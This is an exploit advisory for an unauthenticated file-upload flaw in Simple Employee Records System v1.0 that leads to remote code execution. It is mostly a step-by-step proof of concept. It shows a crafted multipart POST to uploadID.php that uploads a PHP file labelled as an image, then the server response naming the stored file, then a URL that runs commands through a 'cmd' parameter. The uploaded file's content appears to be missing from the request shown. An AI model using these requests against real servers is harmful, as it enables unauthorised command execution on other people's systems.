# Exploit Title: Simple Employee Records System - File Upload RCE (Unauthenticated) # Date: 2021-02-25 # Exploit Author: sml@lacashita.com # Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip # Version: v1.0 # Tested on: Ubuntu 20.04.2 http://IP/dashboard/uploadID.php can be used to upload .php files to '/uploads/employees_ids/' without authentication. POC --- 1) Make the following Request changing the "Host:" to your Victim IP. POST /dashboard/uploadID.php HTTP/1.1 Host: 192.168.1.117 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 Content-Length: 267 DNT: 1 Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php" Content-Type: image/png -----------------------------5825462663702204104870787337-- 2) You will get the response with the randomized name of the uploaded file (upload_filename). HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Feb 2021 19:17:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 77 {"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"} 3) Your file will be located in: http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php 4) In this example, to run commands: http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami